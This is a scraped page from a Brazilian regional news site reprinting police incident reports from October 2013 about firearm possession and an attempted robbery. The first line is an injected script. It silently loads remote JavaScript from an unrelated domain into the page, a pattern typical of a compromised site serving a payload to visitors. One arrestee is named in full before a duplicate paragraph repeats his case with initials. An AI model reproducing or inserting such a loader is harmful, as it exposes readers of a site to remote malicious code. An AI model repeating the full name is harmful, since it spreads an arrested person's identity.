;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências Policiais em destaque 75ª Cia PM - 22/10/2013 - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências Policiais em destaque 75ª Cia PM – 22/10/2013

pmbn

75ª CIA PM – CARANGOLA-MG.

 POSSE ILEGAL DE ARMA DE FOGO EM FERVEDOURO-MG.

            Em 21/10/2013 às 18h40min, no CÓRREGO DA PIRRAÇA, ZONA RURAL DE FERVEDOURO, militares durante a realização de uma operação patrulha de prevenção ativa em zona rural, diligenciaram a residência de GENY DIAS PEDROSA, 65 anos, a fim de apurar denúncia de que ele seria possuidor de uma arma de fogo. Após um diálogo com o denunciado ele assumiu que de fato possuía uma arma de fogo, e entregou um revólver marca Taurus, calibre .32, número 324834, desmuniciado e dentro de um coldre de couro com uma munição parecida com festim encaixada no porta munição. GENY informou que a arma não possuí registro, sendo o autor preso e conduzido juntamente com a arma à 4ª DRPC para as providências de praxe.

            Em 21/10/2013 às 18h40min, no CÓRREGO DA PIRRAÇA, ZONA RURAL DE FERVEDOURO, militares durante a realização de uma operação patrulha de prevenção ativa em zona rural, diligenciaram a residência de G.D.P., de 65 anos, a fim de apurar denúncia de que ele seria possuidor de uma arma de fogo. Após um diálogo com o denunciado ele assumiu que de fato possuía uma arma de fogo, e entregou um revólver marca Taurus, calibre .32, número 324834, desmuniciado e dentro de um coldre de couro com uma munição parecida com festim encaixada no porta munição. O envolvido  informou que a arma não possuí registro, sendo G.D.P., de 65 anos, preso e conduzido juntamente com a arma à 4ª DRPC para as providências de praxe.

             76ª CIA PM – MURIAÉ-MG.

           ROUBO TENTADO À TRANSEUNTE (REDS – 021738644).

            Em 21/10/2013, às 21h49min, na RUA SÃO GERALDO, BAIRRO DORNELAS, MURIAÉ, militares em patrulhamento foram abordados pelo Sr. M.P., informando que um homem ate então desconhecido, havia tentado roubar a bolsa de sua filha, e em contato com a filha do solicitante, A.L.D.R., de 16 anos, relatou que transitava pelo endereço descrito, quando foi surpreendida pelo autor N.F.C., de 26 anos, que também passava pelo local e usando de força física jogou a adolescente ao solo e tentou tirar dela uma mochila, contendo seus pertences, momento que à vitima resistiu a ação do autor, tendo sua bolsa parcialmente danificada, o autor não conseguiu seu intento devido a intervenção verbal de transeuntes, e após à ação criminosa o autor evadiu sentido ao bairro BARRA. De posse das características passadas pela vitima e as testemunhas, foi localizado o autor pela RUA MARECHAL FLORIANO, e apos busca pessoal não foi encontrada nenhuma irregularidade, sendo reconhecido de imediato pela vitima e as testemunha, sendo dado voz de prisão ao mesmo e conduzido para a Delegacia de Polícia, para as providências de praxe.

 PORTE ILEGAL DE ARMA DE FOGO EM MURIAÉ-MG.

            Em  21/10/2013, às 18h17min, na AV. JERUSALEM, BAIRRO PADRE TIAGO, MURIAÉ, decorrente denúncias anônimas via 190 informando que alguns indivíduos estariam ostentando armas de fogo em via pública no citado local, de imediato as guarnições de serviço deslocaram para o endereço, onde um grupo de indivíduos tentaram evadir ao avistarem as viaturas, contudo foram abordados pelos militares, não sendo encontrado em poder dos suspeitos nenhuma arma de fogo, porém, durante buscas nas imediações do local da abordagem, foram encontrados um revolver calibre .38 carregado com seis munições intactas e um revólver calibre .22 carregado com sete munições intactas, porém nenhum dos seis envolvidos assumiram a propriedade das armas. Os envolvidos foram encaminhados a delegacia de polícia, e durante o registro do REDS os menores infratores, C.V.S.,  de 17 anos e E.O.M., de 16 anos, assumiram a propriedade das armas, na tentativa de inocentarem os autores A.C.S.A., de 20 anos “vulgo TIM TIM”, J.A.O., 20 anos, “vulgo JEFINHO”, J.R.G., de 21 anos e J.C.F., de 19 anos, foram presos e juntamente com os adolescentes apreendidos foram todos conduzidos à 4ª DRPC para as providências decorrentes ao fato.


   ASSESSORIA DE COMUNICAÇÃO DO 47° BPM – MURIAÉ / MG

 

 

RUA JOSÉ DE FREITAS LIMA Nº47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3265.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.